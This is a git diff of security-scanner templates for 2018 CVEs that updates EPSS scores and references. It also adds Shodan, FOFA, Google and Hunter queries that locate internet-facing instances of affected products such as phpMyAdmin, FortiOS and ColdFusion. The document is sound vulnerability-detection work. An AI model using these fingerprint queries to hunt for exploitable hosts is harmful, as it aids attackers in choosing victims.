a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index d054420772..44a17c7f65 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12031 cwe-id: CWE-22 - epss-score: 0.00725 - epss-percentile: 0.80248 + epss-score: 0.02759 + epss-percentile: 0.90576 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 917c709de5..abb34c7602 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -25,6 +25,9 @@ info: max-request: 1 vendor: seagate product: nas_os + shodan-query: http.title:"seagate nas - seagate" + fofa-query: title="seagate nas - seagate" + google-query: intitle:"seagate nas - seagate" tags: cve,cve2018,seagate,nasos,disclosure,unauth http: diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 94384ca163..4dc0fdc60e 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -24,6 +24,9 @@ info: max-request: 1 vendor: seagate product: nas_os + shodan-query: http.title:"seagate nas - seagate" + fofa-query: title="seagate nas - seagate" + google-query: intitle:"seagate nas - seagate" tags: cve2018,cve,redirect,seagate,nasos http: diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 5a32b4c999..deeaed9bcc 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -20,13 +20,17 @@ info: cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 - epss-score: 0.97392 - epss-percentile: 0.99908 + epss-score: 0.97369 + epss-percentile: 0.99902 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin product: phpmyadmin + shodan-query: http.title:"phpmyadmin" + fofa-query: title="phpmyadmin" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi http: diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index d6edb3744c..0789ff6ee6 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 - epss-score: 0.95531 - epss-percentile: 0.99245 + epss-score: 0.94448 + epss-percentile: 0.99209 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 52e4353249..307b4d29ec 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-12675 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.44971 + epss-percentile: 0.45948 cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 0842786335..c1035c0910 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-1271 cwe-id: CWE-22 epss-score: 0.004 - epss-percentile: 0.73113 + epss-percentile: 0.73504 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index ec75f3047f..8921fad110 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1335 - epss-score: 0.96734 - epss-percentile: 0.99585 + epss-score: 0.96745 + epss-percentile: 0.99664 cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 0cb4384d6f..1cae4d01e3 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -27,6 +27,7 @@ info: vendor: fortinet product: fortios shodan-query: http.html:"/remote/login" "xxxxxxxx" + fofa-query: body="/remote/login" "xxxxxxxx" tags: cve2018,cve,fortios,lfi,kev,fortinet http: diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index be4ef26f42..da29fe40f3 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -21,12 +21,14 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46406 + epss-percentile: 0.46539 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: fortinet product: fortios + shodan-query: http.html:"/remote/login" "xxxxxxxx" + fofa-query: body="/remote/login" "xxxxxxxx" tags: cve,cve2018,fortios,xss,fortinet http: diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index cbd950e35d..df6be56a15 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.0018 - epss-percentile: 0.5428 + epss-percentile: 0.55107 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index f6a55e3a22..10802111ee 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -20,13 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14013 cwe-id: CWE-79 - epss-score: 0.00755 - epss-percentile: 0.80655 + epss-score: 0.0065 + epss-percentile: 0.7936 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: synacor product: zimbra_collaboration_suite + shodan-query: http.title:"zimbra collaboration suite" + fofa-query: title="zimbra web client sign in" + google-query: intitle:"zimbra collaboration suite" tags: cve,cve2018,xss,zimbra,synacor http: diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index bf166bf6af..c4498e6831 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -15,13 +15,14 @@ info: - https://seclists.org/fulldisclosure/2019/Jan/32 - https://vuldb.com/?id.122045 - https://nvd.nist.gov/vuln/detail/CVE-2018-14474 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-14474 cwe-id: CWE-601 - epss-score: 0.00068 - epss-percentile: 0.28116 + epss-score: 0.00063 + epss-percentile: 0.26641 cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 4039ad5d78..50c5926871 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -21,13 +21,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14574 cwe-id: CWE-601 - epss-score: 0.00828 - epss-percentile: 0.80126 + epss-score: 0.00628 + epss-percentile: 0.78964 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: cve,cve2018,django,redirect,djangoproject http: diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 78b9b928bb..b6d5efdc15 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -25,6 +25,9 @@ info: max-request: 1 vendor: cgit_project product: cgit + shodan-query: http.title:"git repository browser" + fofa-query: title="git repository browser" + google-query: intitle:"git repository browser" tags: cve,cve2018,cgit,lfi,cgit_project http: diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index d18230ef1a..f5bf97e49f 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -20,13 +20,13 @@ info: cvss-score: 9.1 cve-id: CVE-2018-14916 cwe-id: CWE-732 - epss-score: 0.00685 - epss-percentile: 0.79617 - cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* + epss-score: 0.00644 + epss-percentile: 0.79217 + cpe: cpe:2.3:h:loytec:lgate-902:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: loytec - product: lgate-902_firmware + product: lgate-902 tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss http: diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 882b57bf37..c2e66e6be1 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14918 cwe-id: CWE-22 - epss-score: 0.44897 - epss-percentile: 0.97077 + epss-score: 0.43288 + epss-percentile: 0.97355 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: loytec product: lgate-902_firmware shodan-query: http.html:"LGATE-902" + fofa-query: body="lgate-902" tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss http: diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 0276a7408c..7fb0af70ea 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14931 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.44971 + epss-percentile: 0.45948 cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 0c8c87aa62..636a38d5fe 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.01001 - epss-percentile: 0.83284 + epss-percentile: 0.83597 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 792ee61d48..577811a98e 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 - http://seclists.org/fulldisclosure/2018/Aug/34 - https://www.exploit-db.com/exploits/45271/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - epss-score: 0.97149 - epss-percentile: 0.9976 + epss-score: 0.9704 + epss-percentile: 0.99756 cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 42be838d22..2a0195b5ec 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -21,13 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 - epss-score: 0.94576 - epss-percentile: 0.99184 + epss-score: 0.92562 + epss-percentile: 0.98989 cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: argussurveillance product: dvr + shodan-query: http.title:"web viewer for samsung dvr" + fofa-query: title="web viewer for samsung dvr" + google-query: intitle:"web viewer for samsung dvr" tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr http: diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 507df95ba1..068a749ecc 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2018-15917 cwe-id: CWE-79 - epss-score: 0.04217 - epss-percentile: 0.92046 + epss-score: 0.02648 + epss-percentile: 0.90369 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: jorani_project product: jorani shodan-query: title:"Login - Jorani" + fofa-query: icon_hash=-2032163853 tags: cve,cve2018,jorani,xss,jorani_project http: diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 799a2e2293..8051dbeca7 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 - epss-score: 0.97411 - epss-percentile: 0.99921 + epss-score: 0.97436 + epss-percentile: 0.99942 cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive http: diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index bcc16fdd8f..7fc5089482 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16139 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48718 cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: bibliosoft product: bibliopac shodan-query: title:"Bibliopac" + fofa-query: title="bibliopac" + google-query: intitle:"bibliopac" tags: cve,cve2018,xss,bibliopac,bibliosoft http: diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 5880a66046..a7865f4a1b 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -29,6 +29,8 @@ info: vendor: codemenschen product: gift_vouchers framework: wordpress + fofa-query: body="/wp-content/plugins/gift-voucher/" + shodan-query: http.html:"/wp-content/plugins/gift-voucher/" tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen http: diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 29cd045b1a..48403dbf14 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16167 cwe-id: CWE-78 epss-score: 0.27457 - epss-percentile: 0.9669 + epss-percentile: 0.96794 cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 375c7740ab..ef4e429b1a 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - epss-score: 0.0412 - epss-percentile: 0.91963 + epss-score: 0.25721 + epss-percentile: 0.96702 cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index dcf16683bf..31b1b073df 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-16288 cwe-id: CWE-200 epss-score: 0.12055 - epss-percentile: 0.95227 + epss-percentile: 0.95357 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 9ffd6e17c3..8fce44ae25 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.1 cve-id: CVE-2018-16716 cwe-id: CWE-22 - epss-score: 0.00543 - epss-percentile: 0.74952 + epss-score: 0.0045 + epss-percentile: 0.75058 cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 23f9df48fa..093cbd5654 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -14,18 +14,21 @@ info: - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - https://github.com/eventum/eventum/releases/tag/v3.4.0 - https://nvd.nist.gov/vuln/detail/CVE-2018-16761 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-16761 cwe-id: CWE-601 - epss-score: 0.00068 - epss-percentile: 0.28116 + epss-score: 0.00069 + epss-percentile: 0.29966 cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: eventum_project product: eventum + shodan-query: http.favicon.hash:305412257 + fofa-query: icon_hash=305412257 tags: cve,cve2018,redirect,eventum,oss,eventum_project http: diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index ce8c147b8c..543356e243 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16763 cwe-id: CWE-74 - epss-score: 0.83285 - epss-percentile: 0.98356 + epss-score: 0.79227 + epss-percentile: 0.98278 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: thedaylightstudio product: fuel_cms + shodan-query: http.title:"fuel cms" + fofa-query: title="fuel cms" + google-query: intitle:"fuel cms" tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio http: diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index d98d6b1447..38a7254a31 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16836 cwe-id: CWE-22 epss-score: 0.26631 - epss-percentile: 0.96643 + epss-percentile: 0.96743 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index d47482ca8a..df5c6fa029 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: monstra product: monstra + shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss http: diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 2a1cad77ca..5a40cf4a8c 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17153 cwe-id: CWE-287 - epss-score: 0.81607 - epss-percentile: 0.98273 + epss-score: 0.59445 + epss-percentile: 0.97757 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: western_digital product: my_cloud_wdbctl0020hwt_firmware shodan-query: http.favicon.hash:-1074357885 + fofa-query: icon_hash=-1074357885 tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital http: diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 6fdc4ec1a6..7beff17567 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: elastic product: kibana + shodan-query: http.title:"kibana" + fofa-query: title="kibana" + google-query: intitle:"kibana" tags: cve,cve2018,lfi,kibana,vulhub,elastic http: diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index cca82bc302..63ae0948f8 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -11,13 +11,16 @@ info: reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ + - https://github.com/Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17254 cwe-id: CWE-89 - epss-score: 0.81793 - epss-percentile: 0.98093 + epss-score: 0.81623 + epss-percentile: 0.9836 cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 28743e3369..18a7b2afcb 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.44971 + epss-percentile: 0.45948 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: dotcms product: dotcms shodan-query: http.title:"dotCMS" + fofa-query: title="dotcms" + google-query: intitle:"dotcms" tags: cve2018,cve,redirect,dotcms http: diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index c0b21f42aa..805cbeff17 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 - epss-score: 0.96092 - epss-percentile: 0.99459 + epss-score: 0.95251 + epss-percentile: 0.9934 cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 64fb92a805..d4f8177ae5 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -21,13 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18323 cwe-id: CWE-22 - epss-score: 0.9648 - epss-percentile: 0.99556 + epss-score: 0.95438 + epss-percentile: 0.99372 cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 vendor: control-webpanel product: webpanel + shodan-query: http.title:"login | control webpanel" + fofa-query: title="login | control webpanel" + google-query: intitle:"login | control webpanel" tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss http: diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 5ba6bb99ba..ecb172f620 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18570 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.39642 + epss-percentile: 0.40792 cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index c9d46aecf6..4e97a203a8 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -29,6 +29,7 @@ info: vendor: dedecms product: dedecms shodan-query: http.html:"DedeCms" + fofa-query: body="dedecms" tags: cve2018,cve,dedecms,xss http: diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index af06330091..27f9cdb3c9 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -14,13 +14,15 @@ info: - https://www.exploit-db.com/exploits/45755 - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18777 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2018-18777 cwe-id: CWE-22 - epss-score: 0.00224 - epss-percentile: 0.60675 + epss-score: 0.00185 + epss-percentile: 0.5564 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 1b1f7330fd..c43ce87f60 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18778 cwe-id: CWE-200 - epss-score: 0.17666 - epss-percentile: 0.96022 + epss-score: 0.39341 + epss-percentile: 0.97248 cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 32940d4fec..ea93f406fa 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18809 cwe-id: CWE-22 - epss-score: 0.43128 - epss-percentile: 0.97253 + epss-score: 0.50316 + epss-percentile: 0.97524 cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: tibco product: jasperreports_library shodan-query: html:"jasperserver-pro" + fofa-query: body="jasperserver-pro" tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco http: diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 568e65f5fe..963396b644 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -20,12 +20,15 @@ info: cve-id: CVE-2018-18925 cwe-id: CWE-384 epss-score: 0.09538 - epss-percentile: 0.94612 + epss-percentile: 0.94736 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: gogs product: gogs + google-query: intitle:"sign in - gogs" + shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + fofa-query: title="sign in - gogs" tags: cve,cve2018,gogs,lfi,rce,vulhub http: diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 6439455c7b..afccd29931 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19137 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39294 